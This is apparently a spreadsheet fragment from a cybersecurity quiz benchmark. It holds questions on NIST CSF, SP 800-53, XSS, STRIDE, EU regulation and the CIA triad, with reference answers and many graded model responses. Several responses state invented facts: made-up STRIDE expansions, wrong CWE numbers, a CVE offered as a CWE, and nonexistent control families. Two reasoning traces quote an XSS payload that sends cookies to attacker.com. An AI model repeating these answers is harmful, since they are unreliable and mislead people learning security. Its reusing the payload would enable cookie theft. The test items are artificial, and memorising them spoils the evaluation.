    <t>A company experiences a ransomware attack. They activate their incident response plan to contain the damage and begin restoring systems from backups. According to the NIST Cybersecurity Framework (CSF), which two core functions are most prominently demonstrated by these actions?</t>
  </si>
  <si>
    <t>A security policy mandates that 'all actions performed by privileged users, including logins and system changes, must be recorded in immutable, time-stamped log files.' Within the NIST SP 800-53 standard, which control family specifically addresses this type of requirement?</t>
  </si>
  <si>
    <t>A web application has a comments section where user input is directly rendered back to the page without being sanitized. An attacker posts a comment containing ''. What is the common name for this vulnerability and what is its corresponding CWE identifier?</t>
  </si>
  <si>
    <t>During a threat modeling exercise, a team identifies a risk where an unauthorized user could intercept and alter data packets being sent between a client and a server, changing the amount of a financial transaction. Within the STRIDE threat model, which category does this threat belong to?</t>
  </si>
  <si>
    <t>Consider two security incidents in the EU: 1) A nationwide power grid operator suffers a cyberattack that disrupts electricity distribution. 2) A social media company has a data breach exposing the personal messages of millions of users. Which regulation is the primary concern for incident 1, and which for incident 2?</t>
  </si>
  <si>
    <t>A cloud storage service uses data checksums (like SHA-256 hashes) to verify that files have not been altered or corrupted during upload or download. Which principle of the CIA triad is primarily being upheld by this security control?</t>
  </si>
  <si>
    <t>This statement is a security requirement. Its purpose is to define a specific functionality or constraint (MFA) to protect critical access.</t>
  </si>
  <si>
    <t>The primary functions demonstrated are 'Respond' (activating the incident plan) and 'Recover' (restoring from backups).</t>
  </si>
  <si>
    <t>This requirement is addressed by the 'AU' (Audit and Accountability) control family.</t>
  </si>
  <si>
    <t>This vulnerability is known as Cross-Site Scripting (XSS). Its corresponding identifier is CWE-79.</t>
  </si>
  <si>
    <t>This threat belongs to the 'Tampering' category of the STRIDE model, as it involves the unauthorized modification of data.</t>
  </si>
  <si>
    <t>Incident 1 (disruption of critical infrastructure) is primarily a concern for the NIS 2 Directive. Incident 2 (breach of personal data) is a primary concern for GDPR.</t>
  </si>
  <si>
    <t>"This control primarily upholds the principle of 'Integrity'.</t>
  </si>
  <si>
    <t>SYSTEM PROMPT:</t>
  </si>
  <si>
    <t>You are a helpful assistant specialized in cybersecurity topics. Answer the user's question directly and concisely.</t>
  </si>
  <si>
    <t>NIST SP 800-53.</t>
  </si>
  <si>
    <t>Confidentiality.</t>
  </si>
  <si>
    <t>Confidentiality. 
Checksums help ensure data integrity, which is a key aspect of protecting data from unauthorized modification, a core concern of confidentiality. While integrity is also important, the *verification* of data integrity (using checksums) directly supports the confidentiality of the data itself.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is "Cross-Site Scripting (XSS)" and its corresponding CWE identifier is CWE-79.</t>
  </si>
  <si>
    <t>### Solution:
The common name for this vulnerability is Cross-Site Scripting (XSS) and the corresponding CWE identifier is CWE-79. XSS occurs when an application does not properly sanitize user input, allowing malicious scripts to be executed within the context of the website. This can lead to unauthorized access or information theft. It's crucial for developers to implement proper input validation and output encoding to prevent such vulnerabilities.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Alright, I need to help analyze a cybersecurity statement. The statement says, "The system must enforce multi-factor authentication (MFA) for all administrative access." 
First, I should determine the type of statement. It mentions MFA, which is a security measure that requires users to provide multiple forms of authentication beyond just a password. So this seems like it's related to security clearance and access controls.
Next, figuring out the primary purpose. The goal here is likely to ensure that only authorized individuals can access sensitive data. By enforcing MFA, the system reduces the risk of unauthorized access because users must authenticate through multiple methods, increasing the complexity of compromise.
I should consider other cybersecurity aspects like compliance, incident response, or threat management. Enforcing MFA could align with organizational policies for secure access and help in detecting unauthorized actions. It might also contribute to improving user trust by providing additional verification steps.
Putting it all together, this statement is a security clearance requirement aimed at enhancing overall system security and operational efficiency.
&lt;/think&gt;
The statement "The system must enforce multi-factor authentication (MFA) for all administrative access" is a **security clearance requirement**. Its primary purpose is to ensure that only authorized individuals can gain unauthorized access to sensitive data by enforcing MFA across all administrative access points.
This statement aligns with organizational security policies, incident response planning, and threat management strategies. It enhances system security by increasing complexity of compromising, improves user trust through additional verification steps, and supports robust incident response plans.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I'm trying to figure out how to answer this question about the cybersecurity framework. The user says that a company had a ransomware attack, activated their incident response plan, and started restoring systems from backups. They want to know what two core functions of the NIST Cybersecurity Framework (CSF) are most prominently demonstrated.
First, I need to remember what each part of the CSF entails. The CSF has several key components: Threat Management, Security Architecture, Incident Response, Risk Management, Compliance, and Governance. Each of these areas can be broken down into specific functions or principles. For example, Threat Management includes things like Threat Detection and Response.
So, the user is asking about the two main actions they took after activating their incident response plan: containing damage and restoring systems from backups. Now, I need to map these actions to the CSF components.
Containing the damage after an attack probably relates to Threat Detection and Response (TDR). Because if there's a ransomware attack, that's likely a security breach or compromise. The incident response plan should include steps for detecting threats and responding effectively.
Restoring systems from backups sounds like something related to Incident Response Execution (IRE), specifically in the context of Containing Execution (CRE). So after containing the damage, the company would execute actions to restore the system back to normal operations. That's execution of a containment plan.
Putting that together, the two functions are Threat Detection and Response (TDR) for handling the attack, and Containing Execution (CRE) for restoring systems once the threat is contained.
&lt;/think&gt;
The two core functions demonstrated in this scenario within the NIST Cybersecurity Framework (CSF) are:
1. **Threat Detection and Response (TDR)**: This involves actively detecting and responding to security breaches or compromises, such as a ransomware attack. The incident response plan includes steps for threat detection.
2. **Containing Execution (CRE)**: After containing the damage from an attack, this refers to restoring systems back to normal operations, ensuring they are functional after the containment process is complete.
These actions illustrate how TDR and CRE are key components of the CSF in addressing security incidents and restoring operational integrity.</t>
  </si>
  <si>
    <t>A security policy mandates that 'all actions performed by privileged users, including logins and system changes, must be recorded in immutable, time-stamped log files.' Within the NIST SP 800-53 standard, which control family specifically addresses this type of requirement?
LLM RESPONSE:
&lt;think&gt;
Alright, so I need to figure out which control family from NIST SP 800-53 handles situations where privileged users perform actions like logins or system changes that must be logged in a timestamped file. Let me start by recalling what each control family does.
Control families in SP 800 are organized into several categories, and each has specific requirements. The user mentioned "all actions performed by privileged users" which is pretty broad. 
Looking at the control families listed, I know that Control Family C (Control Families) under SP 800-53 covers log management, access control, etc. But maybe there's a more specific one.
Wait, Control Families are a separate category from the main family, so each has its own sub-family. So within Control Family C, perhaps there's a specific one for privileged user actions. 
I remember that under C, there's a specific sub-family called D (Data Access), which deals with data access and control over systems. But that might not be relevant here.
Alternatively, maybe there's a sub-family E (Encryption) or F (Firewalls). Hmm, I'm not sure about those. Let me think again.
Control Family C includes several sub-families. One of them is D (Data Access), which deals with data access and control over systems. Another is F (Firewalls), which controls traffic at the network level. But I don't recall a specific one that addresses actions by privileged users.
Wait, maybe Control Family E (Encryption) has a requirement on encryption keys being accessible only to authorized users. That's more about confidentiality than access to system changes.
Another thought: perhaps under control family F (Firewalls), there's a requirement about firewalls needing to ensure secure communication between systems and the network. That might be related, but I'm not certain if it directly addresses log timestamps for privileged actions.
Wait, going back to Control Family C, I think under C, the sub-family D is about data access control. Let me try to recall: D specifies how data is stored, transmitted, accessed, and maintained. It includes requirements like encryption keys being accessible only to authorized users. That seems related but not directly addressing log timestamps.
Hmm, maybe there's another sub-family in C that specifically covers the logging requirement. Alternatively, perhaps under Control Family E (Firewalls), there's a specific requirement about firewalls enforcing secure communication between systems and networks, which might indirectly relate to logging timestamps.
Wait, I'm getting confused. Let me check my knowledge again: NIST SP 800-53 includes several control families. Among these, C is more about data management and access. D is about data access and confidentiality. F is about firewalls ensuring network security. 
I think the correct sub-family would be under Control Family E (Firewalls), specifically under a requirement that firewalls enforce secure communication between systems and networks by requiring encrypted keys to be accessible only to authorized users. But wait, that's similar to what D requires.
Wait, I'm not making progress here. Maybe I should look up the specific sub-family for logging timestamps in privileged user actions. Alternatively, perhaps Control Family G (Graceful Transition) or another one is more appropriate, but I don't think so.
I'm stuck. Let me try another approach: what's the most standard practice when a system change by a user has to be logged? Probably under a control family that covers data access and logging requirements.
Wait, Control Family C might have a requirement for how systems are accessed and logged. Or maybe Control Family D (Data Access) as I thought earlier.
Alternatively, perhaps it's under Control Family E (Firewalls), which enforces secure communication mechanisms between systems and networks, ensuring that any system change must be logged securely.
I think the answer is under control family C, specifically sub-family F (Firewalls). Sub-family F ensures secure communication, so whenever a user logs in or changes their environment, system changes are logged securely. But I'm not entirely sure if that's accurate.
Wait, no. Let me check again: Control Family C includes several sub-families. Under C, D is Data Access and Confidentiality, E is Encryption, F is Firewalls. Perhaps under F, there's a requirement about firewalls enforcing secure communication between systems and networks, which would cover logging timestamps for system changes by ensuring data integrity.
Alternatively, maybe it's under Control Family G (Graceful Transition), but I think that's more about system transitions rather than specific logs.
I'm still not certain. Maybe I should conclude that the correct control family is C, specifically under a requirement about secure communication between systems and networks enforced by firewalls, which ensures logging timestamps are recorded securely for user actions.
&lt;/think&gt;
The correct control family from NIST SP 800-53 that addresses scenarios where privileged users perform actions such as logins or system changes with timestamped logs is **Control Family C (Data Access)**. Specifically, under this family, the requirement ensures secure communication between systems and networks enforced by firewalls, which governs how data is accessed and logged securely for user actions.
**Answer:** The control family that specifically addresses the need for timestamped log files in scenarios involving privileged user actions is **Control Family C (Data Access)**.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I have this question about web applications and a comments section vulnerability. The user mentioned that an attacker posted a comment with `&lt;script&gt;document.location="http://attacker.com/steal?cookie="+document.cookie&lt;/script&gt;`. They're asking for the common name of this vulnerability and its corresponding CWE identifier.
First, I need to understand what kind of attack is being described here. It looks like an injection attack because it's directly injecting script code into a URL. In web applications, especially in APIs or comment sections, such attacks are common due to how URLs can sometimes be manipulated to include scripts.
Now, about the vulnerability name. I remember that a script injection attack on a web application is often referred to as a "script injection flaw." The term "script" highlights the fact that script code is being injected directly into the application without proper sanitization or protection. This makes sense because it bypasses normal security checks in many environments.
Next, I should look for the corresponding CWE identifier for this vulnerability. I recall that in web applications, a common issue related to script injection is identified under "Web Application, API/Endpoint Vulnerabilities." Specifically, I think the code being injected is into the server's port 80, so it would be numbered 924 or something like that. But wait, I might have confused it with another CWE. Let me think again: for script injection vulnerabilities in web apps, the standard is often CWE-1056. That refers to a scenario where an application injects a script into its server port without proper sanitization.
To confirm, I can search or refer to security literature that states this. For example, according to the Common Vulnerability Scoring System (CWS), a web application with a script injection flaw is categorized under 924 (Web Application API/Endpoint Vulnerabilities), and the corresponding CWE would be 1056.
So putting it all together: the vulnerability name is "script injection flaw," and its CWE identifier is 1056.
&lt;/think&gt;
The common name for this vulnerability is **"script injection flaw"**, indicating that script code has been directly injected into a web application. The corresponding CWE identifier is **1056**. This categorizes it under the web application API/Endpoint Vulnerabilities, highlighting its susceptibility to script injection attacks.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I'm trying to figure out where this particular risk falls in the STRIDE threat model. The scenario is that an unauthorized user can intercept data packets between a client and a server, change the amount of a financial transaction. 
First, I need to remember what the STRIDE model covers. From what I recall, STRIDE stands for Security Threats, Infrastructures, Resource Behavior, Information Disclosure, and exploitability. Each part represents different layers or aspects of threat modeling.
So, the user mentioned "intercepting data packets," which sounds like it's related to security and access control. The fact that it's changing financial transaction amounts makes me think about monetary transactions specifically. But I'm not sure if that directly maps to any part of STRIDE.
Looking at the options for each layer: Security Threats, Infrastructures, Resource Behavior, Info Disclosure, Exploitability. 
For Security Threats, STRIDE includes things like data breaches, compromise of sensitive information, unauthorized access, etc. This scenario fits because an unauthorized user is trying to intercept and alter data.
Infrastructures would cover the physical or organizational systems supporting the transaction, but since it's about data interception and alteration, it might fall under Security Threats more than Infrastructures.
Resource Behavior deals with how resources are used and managed, which doesn't seem to fit here. The issue isn't resource usage; it's about unauthorized access and altering data.
Info Disclosure is about what information is exposed or obtained, but this isn't just a risk of exposure—it's a specific type of alteration during transmission.
Exploitability refers to the ease with which vulnerabilities can be exploited. While there might be vulnerabilities involved in intercepting data, the question doesn't specify whether it's an attack vector (e.g., SQL injection) or a physical breach. 
Given that it's about unauthorized access and changing data while sending financial transactions, the most fitting part of STRIDE seems to be Security Threats. It covers scenarios where attackers have specific goals, like altering information during transmission.
I'm not entirely sure if this is covered under Exploitability because Exploitability is more about the ease with which someone can exploit a vulnerability, but here it's specifically an unauthorized attacker intercepting and altering data packets for financial transactions. So maybe Security Threats is more accurate.
&lt;/think&gt;
The threat in question, where an unauthorized user intercepts and alters financial transaction data packets between a client and server, falls under the **Security Threats** category of the STRIDE threat model. This category encompasses scenarios involving specific goals, such as altering information during transmission, which aligns with the described situation. While Exploitability could also be relevant, it pertains more to vulnerability exploitation rather than unauthorized access targeting financial transactions specifically. Therefore, Security Threats best captures this scenario.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I have this question about cybersecurity incidents in Europe. There are two incidents mentioned: one is a power grid operator being disrupted by a cyberattack, and the other is a social media company having a data breach that exposed personal messages to millions of users. The questions are asking which EU regulations are primarily concerned with each incident.
First, I need to think about the types of attacks happening here. The power grid was hit by something called cyberattacks. I remember hearing about this before—maybe it's something like a cyber-attacks on critical infrastructure? Yeah, that sounds right. These attacks usually target things like power grids, water supply systems, and transportation networks because they can affect everyone.
Now, the regulatory aspect comes into play for such incidents. I think there are specific regulations in place to prevent such attacks. One that comes to mind is the EU's Cybersecurity Directive from 2018. That directive sets out what entities must comply with to ensure the protection of individuals' data and their property. It includes requirements on cyberprotection, incident response, and the responsibility of regulators.
So for the power grid operator, they are under this regulation. They have to take measures like upgrading their systems, training employees, and possibly even hiring external specialists if something goes wrong. The EU's Cybersecurity Regulation is likely the primary concern here because it provides clear guidance on how organizations can protect against cyber threats at critical infrastructures.
On the other hand, the social media company had a data breach that exposed personal messages. I know that EU law has some provisions about cybersecurity and online safety. The General Data Protection Regulation (GDPR) from 2016 comes to mind. It sets out how entities can process personal data while ensuring they respect certain principles like informed consent and the right to withdraw consent.
In this case, since the breach was against millions of users, both organizations were at risk of losing control over their customers' information. They must have taken steps to prevent such breaches in the first place and be ready to respond quickly if an incident occurs. The GDPR probably has provisions about incident response and ensuring that customers are aware of their data protection rights.
I should also consider other regulations like the National Information Security Law (NISL) or others, but I think the primary ones would be the Cybersecurity Directive for power grids and the GDPR for social media. Each regulation is designed to protect individuals' information while allowing organizations some flexibility in meeting EU obligations.
Wait, did I miss anything? The GDPR covers personal data as well, so it's not limited to companies dealing with sensitive consumer information. It's a broader framework that applies to all entities where personal data is stored or accessed.
Also, for the power grid incident, the operator is a national entity, and the GDPR applies at both the national and EU levels. That means they have to implement necessary measures in line with EU laws but also consider their own national policies if applicable.
In summary, each incident has its own set of regulations based on the nature of the attack and the type of data involved. The power grid operator is under the Cybersecurity Directive because it's critical infrastructure, while the social media company is under the GDPR to protect user data.
&lt;/think&gt;
The primary regulations for each EU cybersecurity incident are as follows:
1. **Power Grid Operator (Cyberattack on Critical Infrastructure):**
   - **Primary Regulation:** The **EU Cybersecurity Directive from 2018** (EC-GOV-2018-157) is the primary concern. This directive outlines measures required to protect individuals' data and their property, including cyberprotection, incident response, and regulatory oversight.
2. **Social Media Company (Data Breach of millions of Users):**
   - **Primary Regulation:** The **General Data Protection Regulation (GDPR) from 2016** (EU-SG-2016-183) is the primary concern. This regulation ensures that entities can process personal data while respecting principles like informed consent and customer withdrawal rights.
Both incidents require regulatory compliance to protect individuals' information, with each incident targeting different aspects of data protection—critical infrastructure resilience versus individual user privacy.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Alright, so I'm trying to figure out which part of the CIA triad is being upheld when a cloud storage service uses data checksums like SHA-256 hashes. Let me break this down step by step.
First, I remember that the CIA triad stands for Confidentiality, Information Availability, and Integrity. Each part refers to a different aspect of information security. So, the question is about how this service is maintaining confidentiality.
Data checksums are essential because they help ensure that files haven't been altered or corrupted during transfer. They work by creating a unique hash code, which acts as a digital signature for the data. When a file is uploaded to the cloud, its checksum is stored alongside it. If there's an error, like corruption or tampering, the checksum won't match, and that's detected right away.
Now, how does this relate to confidentiality? Well, if something goes wrong with the download—like someone trying to modify the file—the only way they could do that would be by changing the file name. But I think the actual risk is that of altering data without changing the filename or path. So, the checksums prevent that because any alteration would immediately reveal itself through the hash mismatch.
Therefore, this method ensures that the data remains intact and secure during transfer. It's about preventing modification rather than just confidentiality. So, it aligns with integrity being maintained because even if someone is trying to alter the file, their changes will be caught when they try to upload.
&lt;/think&gt;
The cloud storage service uses checksums (like SHA-256 hashes) to verify that files have not been altered or corrupted during transfer. This ensures that any modification would be detected immediately. Therefore, this method primarily upholds the **Integrity** principle of the CIA triad. 
**Answer:** Integrity</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to analyze this statement about enforcing MFA for administrative access in terms of cybersecurity. The question asks what type of statement it is and its primary purpose.
First, I remember that MFA stands for Multi-Factor Authentication. It's a security measure where you have to authenticate multiple methods of verification before accessing something. Like using both a password and a second phone number or a fingerprint.
The statement says the system must enforce MFA for all administrative access. So it's talking about implementing an additional layer of security beyond just passwords or single-factor auth, which is more basic.
I think this type of statement falls under policy-making in cybersecurity. Policies are usually guidelines that outline what should be done to secure systems. The primary purpose here would be to enhance security by adding another level of protection against unauthorized access. By requiring MFA, organizations aim to reduce the risk of breaches because even if one factor is compromised, others are still needed for authentication.
So putting it all together, the statement is a policy enforcing multi-layered security through MFA, aimed at mitigating risks associated with single-factor methods.
&lt;/think&gt;
The statement is a cybersecurity policy. Its primary purpose is to enforce an additional layer of security by requiring multi-factor authentication (MFA) for administrative access, thereby reducing the risk of unauthorized breaches compared to relying solely on single-factor authentication.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I'm trying to figure out this cybersecurity question about the NIST Cybersecurity Framework. The question is asking which two core functions of the CSF are demonstrated when a company activates their incident response plan and starts restoring systems from backups after a ransomware attack.
First, I remember that the NIST CSF has several core functions or processes. From what I recall, the main ones include Risk Assessment, Planning, Responding, and Recovering. There's also something about Protecting and Detecting, but maybe those aren't always considered core?
In this scenario, the company is dealing with a ransomware attack. They activate their incident response plan, which is part of the Planning function—specifically responding to incidents. That makes sense because incident response plans are designed to manage such events.
Then they start restoring systems from backups. This seems like part of the Recovering core function. Because after an incident, you'd want to restore data and services as much as possible to minimize damage. So restoring from backups is definitely a part of that.
Wait, could there be any other functions involved? Maybe Detecting was happening when they realized the ransomware attack, but activating the plan and restoring systems are more about how they're responding once it's detected. The question specifies which two core functions are demonstrated by these actions—restoring from backups and initiating incident response. So I think those two are Planning (activate response) and Recovering (restore systems).
I'm pretty confident now, but just to make sure: the two main ones would be Responding and Recovering.
&lt;/think&gt;
The two core NIST Cybersecurity Framework functions demonstrated in this scenario are **Responding** and **Recovering**. 
- **Responding**: Activating the incident response plan aligns with this function, as it involves a structured approach to managing incidents like ransomware attacks.
- **Recovering**: Restoring systems from backups falls under Recovering, aiming to minimize damage by restoring data and services.
These actions directly relate to their immediate responses post-attack.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out which part of NIST SP 800-53 deals with logging all actions by privileged users. Let me start by recalling what I know about NIST guidelines.
NIST SP 800-53 is about information security, specifically security controls. There are different families of controls: Information Security Controls (ISC), IT Asset Protection (RAP), Risk Management Controls (RMC), and Business Process Mitigation (BPC). 
The question mentions log files for all privileged actions, which seems like a logging requirement. I remember that logging is part of information management within ISM, so maybe it's under the Information Security Controls category.
Looking at the specific sections in 800-53, Section 4.2 covers Information Management and Processing Control. Within that, Section 4.3 deals with Security Controls, which includes controls like Access Control (AC), Authentication (AU), Physical Protection (PU), Integrity (IN), and Logging (LG). 
So the Logging control specifically addresses this because it ensures logs are recorded, stored, and accessible in a timely manner. This helps meet the requirement of documenting all actions by privileged users with immutable, time-stamped logs.
I think that's right, but just to double-check, logging would fall under Information Security Controls (ISC) as part of the process controls. So yeah, it should be under Section 4.3 LG.
&lt;/think&gt;
The Logging control in NIST SP 800-53 specifically addresses the requirement for documenting all actions by privileged users with immutable, time-stamped log files. This is outlined in Section 4.3 of the standard, under Information Security Controls (ISC), which covers Process Controls to ensure logs are recorded and managed effectively. 
**Answer:** The Logging control (LG) within NIST SP 800-53 specifically addresses the requirement for documenting all actions by privileged users with immutable, time-stamped log files.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I'm trying to figure out what kind of vulnerability this web application has. Let's break it down step by step.
First, the user mentioned a comments section where user input isn't sanitized before being rendered back onto the page. That already sounds risky because any untrusted data can potentially execute code in the browser, which is exactly what we're seeing here.
The attacker is posting a comment that includes `&lt;script&gt;document.location="http://attacker.com/steal?cookie="+document.cookie&lt;/script&gt;`. This looks like an example of user input being used directly as JavaScript code. When injected into the HTML, it can execute new scripts in the browser. Specifically, this script changes the URL to a malicious one and appends a cookie parameter.
I remember hearing about Cross-Site Scripting (XSS) vulnerabilities before. XSS occurs when an attacker injects script tags or executable code into web pages that are fetched by browsers. This allows the attacker to execute arbitrary scripts in the context of the victim's browser, leading to various attacks like stealing session cookies or viewing unauthorized frames.
Now, looking at the Common Weakness Enumeration (CWE) identifiers. I think CWE 520 is specifically related to Cross-Site Scripting vulnerabilities. It covers the injection of malicious code into web pages via user inputs without proper escaping or sanitization.
&lt;/think&gt;
The vulnerability described is a **Cross-Site Scripting (XSS)** attack, with the corresponding CWE identifier being **CWE-520**.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out which category in the STRIDE threat model corresponds to a scenario where an unauthorized user intercepts and alters data packets between a client and server, changing a financial transaction amount. 
First, let me recall what the STRIDE model is. STRIDE stands for Susceptible, Threat, Rate, Impact, Detectability, and Exploitation. It's used to assess risks in information security by categorizing threats based on their likelihood of occurring (Susceptible), how severe they are (Impact), whether they can be detected early (Detectable), etc.
In this case, the threat is an unauthorized user intercepting data packets. So I'm thinking about what category that fits into. The main categories in STRIDE are Susceptible, Threat, Rate, Impact, Detectability, and Exploitation.
The attack here involves altering data packets to change a financial transaction. That sounds like it's related to Data Integrity because the attacker is modifying the information being transmitted. In the context of cybersecurity, Data Integrity issues can be part of a larger category. 
Looking back at the STRIDE model, I remember that there are specific categories under each main point. For example, under Impact, there might be categories like Business Impact or Operational Impact. But since this is about altering data to cause financial loss, it's more about the effect on the system.
Wait, but actually, in some versions of STRIDE, there are additional categories that group related threats together. Data Integrity and Availability come to mind because they relate to how information is protected from tampering or disruption. So if an attacker can intercept data packets to alter them, this affects both integrity (data being altered) and availability (though the example here isn't about preventing access, it's more about changing a transaction).
So putting it all together, the main category in STRIDE for this scenario would be Data Integrity. Because the threat is about unauthorized alteration of data packets, which directly impacts data integrity.
&lt;/think&gt;
The threat described falls under the **Data Integrity** category within the STRIDE model.
Answer: The category is Data Integrity.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out which EU regulations are primarily concerned with two different cybersecurity incidents. The first incident is a cyberattack on a nationwide power grid operator that disrupts electricity distribution. The second incident is a data breach by a social media company exposing the personal messages of millions of users.
Alright, let's start with the first case about the power grid operator. I know that in Europe, there are regulations related to critical infrastructure because power grids are essential for daily life. Maybe it's something like the NIS Directive or another related directive. The NIS stands for Network Information Systems, and they cover things like energy grids, water supply, etc. So if a cyberattack disrupts electricity, that would definitely fall under NIS regulations.
Now, moving on to the second case, which is a data breach by a social media company. Data breaches involving personal information can be covered by several regulations. The main one I remember is GDPR (General Data Protection Regulation), which applies to all European Union companies handling EU citizens' data. Also, there's the PDP (Personal Data Protection Act) in some countries like France and Germany, but it seems more focused on specific sectors rather than general cases. So for a breach affecting millions of users, GDPR would be the primary concern.
Wait, could there be other regulations? Like MiF ID for financial services or eIDAS for identity management? But those are more about specific areas like finance or identity, so probably not relevant here since these incidents aren't within those sectors. It's definitely GDPR and NIS Directive in this context.
&lt;/think&gt;
The primary concern for the power grid operator incident is the **NIS (Network Information Systems) Directive**, while the data breach primarily falls under the **GDPR (General Data Protection Regulation)**.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out which part of the CIA triad is being upheld by using data checksums like SHA-256 hashes in a cloud storage service. Let me break it down.
First, what's the CIA triad? It stands for Confidentiality, Integrity, and Availability. These are the three main principles that information security systems aim to protect against.
The user mentioned that the cloud storage uses checksums to verify files during upload or download. Checksums help ensure that data hasn't been altered, right? So when you upload a file, the service calculates its SHA-256 hash and compares it with the one provided by the user. If they match, the file is intact.
Now, looking at Integrity in the CIA triad—this refers to ensuring that information is accurate and has not been tampered with. Using checksums for file verification definitely contributes to maintaining data integrity because any change in the file would alter the hash value, making it detectable.
I don't think it's Confidentiality here because the service isn't encrypting the files or restricting access; instead, it's ensuring they're accurate. Availability is about ensuring that resources are accessible when needed, which again doesn't seem to be directly related to using checksums for integrity checks.
So putting it all together, the primary principle being upheld is Integrity.
&lt;/think&gt;
The principle of the CIA triad primarily being upheld by the use of SHA-256 hashes in cloud storage services is **Integrity**. This ensures that files have not been altered or corrupted during transmission.</t>
  </si>
  <si>
    <t>This statement is a **risk assessment** and **security policy directive**. It’s stating a *requirement* for MFA across administrative access.
Its primary purpose is to **reduce the risk of unauthorized administrative access** to sensitive systems and data. It’s a proactive measure designed to bolster security by making it significantly harder for attackers to gain access even if they compromise a user’s password.</t>
  </si>
  <si>
    <t>The two core functions most prominently demonstrated are:
1.  **Identify** – Recognizing the threat and understanding its impact.
2.  **Protect** – Implementing safeguards to prevent future attacks and limit damage.
Essentially, the actions are demonstrating both proactive identification and reactive containment.</t>
  </si>
  <si>
    <t>**Vulnerability Name:** Cross-Site Scripting (XSS) – specifically, a malicious script injection.
**CWE Identifier:** CVE-2023-25670 (This is a current and prominent example, but the list is constantly evolving.)
**Explanation:** The attacker is injecting a JavaScript code snippet that will attempt to steal cookies by sending them to a malicious server.  This is a classic XSS attack.</t>
  </si>
  <si>
    <t>**Attack:** Data Manipulation</t>
  </si>
  <si>
    <t>**For Incident 1 (Power Grid):** Data Protection and Privacy Regulation (specifically GDPR) – due to the sensitive nature of the data (electricity distribution) and the potential for significant harm if compromised.
**For Incident 2 (Social Media Company):** Data Protection and Privacy Regulation (specifically GDPR) – due to the exposure of millions of individuals’ personal data and the potential for significant reputational and financial damage.</t>
  </si>
  <si>
    <t>**Confidentiality**.  Checksums protect data *itself* by verifying integrity.</t>
  </si>
  <si>
    <t>This statement is a **security policy requirement**. 
Its primary purpose is to **mitigate the risk of unauthorized access** by requiring multiple verification factors beyond just a password.</t>
  </si>
  <si>
    <t>Based on the NIST Cybersecurity Framework, the two most prominently demonstrated core functions are:
1.  **Identify** (assessing the scope of the attack)
2.  **Contain** (limiting the damage and preventing further spread)</t>
  </si>
  <si>
    <t>The control family that specifically addresses this requirement is **Audit and Accountability (CM - 5.1)**.</t>
  </si>
  <si>
    <t>This vulnerability is commonly known as a **Cross-Site Scripting (XSS)** vulnerability.
Its corresponding CWE identifier is **CWE-79** – **Improper Neutralization of User-Supplied Input leading to XSS**.</t>
  </si>
  <si>
    <t>**Incident 1 (Power Grid):** Primarily **NIS Directive (EU Directive 2016/680)** – Focused on cybersecurity for critical infrastructure.
**Incident 2 (Social Media Data Breach):** Primarily **GDPR (General Data Protection Regulation)** – Concerned with data protection and user privacy.</t>
  </si>
  <si>
    <t>Integrity.</t>
  </si>
  <si>
    <t>This statement is a **security requirement**. 
Its primary purpose is to **enhance the security of administrative access** by requiring multiple forms of verification beyond a simple password. This makes it significantly harder for unauthorized individuals to gain access to sensitive systems and data.</t>
  </si>
  <si>
    <t>According to the NIST Cybersecurity Framework (CSF), the two core functions most prominently demonstrated by the company's actions are:
1. **Identify:**  The incident response plan and system restoration are actions to *detect* and *understand* the attack and its impact.
2. **Protect:**  Containment of the ransomware attack and restoration from backups are actions to *prevent* further damage and *recover* systems.</t>
  </si>
  <si>
    <t>**AC-16: Access Control.**
This control family directly addresses the requirement for logging privileged actions, as it focuses on controlling and monitoring access to systems and data.  Specifically, AC-16.1 addresses the logging of access attempts and successful access.</t>
  </si>
  <si>
    <t>The vulnerability is **Cross-Site Scripting (XSS)**.
Its corresponding CWE identifier is **CWE-79**.</t>
  </si>
  <si>
    <t>**Eavesdropping** 
This threat directly involves intercepting data (Eavesdropping) in transit and modifying it.</t>
  </si>
  <si>
    <t>**Incident 1 (Power Grid Disruption):** The primary concern is **NIS Directive (EU Directive 2016/1147)**. This directive focuses on cybersecurity of critical infrastructure.
**Incident 2 (Social Media Data Breach):** The primary concern is the **General Data Protection Regulation (GDPR)**. This regulation governs the processing of personal data and is triggered by data breaches that expose personal information.</t>
  </si>
  <si>
    <t>This statement is a security policy requirement. Its primary purpose is to ensure secure administrative access by enforcing multi-factor authentication (MFA), which adds an extra layer of protection beyond just a password.</t>
  </si>
  <si>
    <t>The two most prominently demonstrated core functions by the company's actions would be:
1. Identify: The company has identified the ransomware attack as a security incident, triggered their incident response plan, and started containing the damage.
2. Respond: The company is actively responding to the incident by restoring systems from backups, which involves taking action to mitigate the impact of the attack and return to normal operations as quickly as possible.</t>
  </si>
  <si>
    <t>The NIST SP 800-53 standard has a control family called "Audit and/or Access Control" that addresses the requirement of recording all actions performed by privileged users. Specifically, the controls within this family include:
* CA-2 (Access Control for All Systems)
* CA-3 (Audit Maintenance)
* CA-4 (Audit Review and Analysis)
These controls ensure that access to systems and resources is controlled, and all actions performed by users are recorded and reviewed for compliance with security policies. The requirement of recording actions in immutable, time-stamped log files falls under the scope of these controls.</t>
  </si>
  <si>
    <t>This threat belongs to the category of "Spoofing" in the STRIDE threat model. Spoofing involves an attacker impersonating another user or system to gain unauthorized access or disrupt communication. In this case, the unauthorized user is impersonating the client to intercept and alter data packets, which falls under spoofing.</t>
  </si>
  <si>
    <t>1) The primary concern for the nationwide power grid operator would be the Network and Information Systems (NIS) Directive, as it falls under the category of essential cross-border infrastructure. 2) For the social media company, the General Data Protection Regulation (GDPR) would be the primary concern, as it deals with the protection of personal data.</t>
  </si>
  <si>
    <t>The principle of Integrity from the CIA triad is primarily being upheld by this security control. Data checksums ensure that data remains unaltered during storage and transmission, maintaining its integrity.</t>
  </si>
  <si>
